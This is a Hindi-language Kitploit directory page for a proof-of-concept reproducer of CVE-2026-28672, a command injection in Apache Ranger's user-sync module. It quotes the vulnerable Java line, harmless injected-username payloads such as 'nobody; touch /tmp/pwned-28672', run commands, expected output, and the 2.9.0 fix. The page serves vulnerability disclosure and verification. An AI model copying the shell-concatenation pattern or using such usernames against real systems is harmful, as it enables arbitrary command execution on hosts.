Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-28672 — Apache Ranger UnixUserGroupBuilder OS command injection (CVE-2026-28672) के लिए proof-of-concept रिप्रोड्यूसर, जो भेद्यता का प्रदर्शन करता है और फिक्स को सत्यापित करता है। | Kitploit
उपकरण/GitHubGitHub/oscerd/cve-2026-28672
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेपर और शोधलर्निंग और शिक्षा
GitHuboscerd/cve-2026-28672

CVE-2026-28672

Apache Ranger UnixUserGroupBuilder OS command injection (CVE-2026-28672) के लिए proof-of-concept रिप्रोड्यूसर, जो भेद्यता का प्रदर्शन करता है और फिक्स को सत्यापित करता है।

रिपॉजिटरी देखें
8घं 37मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-28672 — Apache Ranger UnixUserGroupBuilder OS कमांड इंजेक्शन

Apache Ranger के user-sync (unixusersync) मॉड्यूल में OS कमांड इंजेक्शन के लिए चलाने योग्य प्रूफ-ऑफ-कॉन्सेप्ट रीप्रोड्यूसर।

प्रत्येक सिंक किए गए उपयोगकर्ता के समूहों की गणना करते समय, UnixUserGroupBuilder id कमांड को एक शेल के माध्यम से चलाता है, और उपयोगकर्ता नाम को कमांड लाइन में जोड़ता है:

root@kitploit:~
// ugsync/src/main/java/org/apache/ranger/unixusersync/process/UnixUserGroupBuilder.java  (Ranger <= 2.8.0)
Process process = Runtime.getRuntime().exec(new String[]{"bash", "-c", "id -G " + userName});

उपयोगकर्ता नाम कॉन्फ़िगर किए गए user-sync स्रोत (LDAP/AD या एक फ़ाइल) से आता है, इसलिए यह हमलावर-प्रभावित होता है। शेल मेटाकैरेक्टर युक्त उपयोगकर्ता नाम — जैसे alice; touch /tmp/pwned — OS कमांड के रूप में निष्पादित हो जाता है (CWE-77, कमांड में प्रयुक्त विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन)।

चलाएँ

root@kitploit:~
mvn -q -DskipTests package
docker compose up --build
# or, without Docker (needs bash/id/touch on PATH):
java -jar target/cve-2026-28672.jar
टूल डाउनलोड करें

भेद्य कोड पथ पर अपेक्षित आउटपुट:

root@kitploit:~
[1] Benign username 'nobody':
      id -G nobody -> 65534
[2] Malicious username 'nobody; touch /tmp/pwned-28672' (vulnerable <= 2.8.0):
      injected command executed? marker /tmp/pwned-28672 exists = true
[3] Same malicious username through the 2.9.0 FIX (id run directly, no shell):
      id -G 'nobody; touch /tmp/pwned-28672' -> null
      injected command executed? marker exists = false
>>> PROVEN: ... OS command injection (CWE-77): true

भेद्यता सारांश

गुणमान
प्रोजेक्टApache Ranger — org.apache.ranger.unixusersync (user-sync)
क्लासCWE-77 कमांड में प्रयुक्त विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन ('कमांड इंजेक्शन')
हमला वेक्टरuser-sync स्रोत द्वारा आपूर्ति किया गया शेल मेटाकैरेक्टर युक्त उपयोगकर्ता नाम
प्रभावRanger user-sync होस्ट पर मनमाना OS कमांड निष्पादन
प्रभावित संस्करण0.6 से 2.8 तक
समाधानित संस्करण2.9.0
परामर्शlists.apache.org थ्रेड · CVE-2026-28672
श्रेयAndrea Cosentino

समाधान

Apache Ranger 2.9.0 id को सीधे एक आर्गुमेंट वेक्टर के रूप में चलाता है, इसलिए उपयोगकर्ता नाम एक एकल लिटरल आर्गुमेंट होता है और शेल द्वारा कभी व्याख्या नहीं किया जाता:

root@kitploit:~
// Ranger 2.9.0
Process process = Runtime.getRuntime().exec(new String[] {"id", "-G", userName});

इस रिपॉज़िटरी में UnixUserGroupBuilderVuln.java दोनों रूपों को शब्दशः समाहित करता है, जिन्हें अपस्ट्रीम स्रोत से उद्धृत किया गया है।

अस्वीकरण

यह रिपॉज़िटरी शैक्षिक और रक्षात्मक उद्देश्यों के लिए प्रकाशित की गई है: Apache Ranger उपयोगकर्ताओं को भेद्यता समझने, यह सत्यापित करने में मदद करने के लिए कि वे प्रभावित हैं या नहीं, और यह पुष्टि करने के लिए कि अपग्रेड करने से यह हल हो जाती है। पेलोड हानिरहित है (यह /tmp के अंतर्गत एक मार्कर फ़ाइल बनाता है)। इस सामग्री का उपयोग उन प्रणालियों के विरुद्ध न करें जिनके स्वामी या संचालक आप नहीं हैं।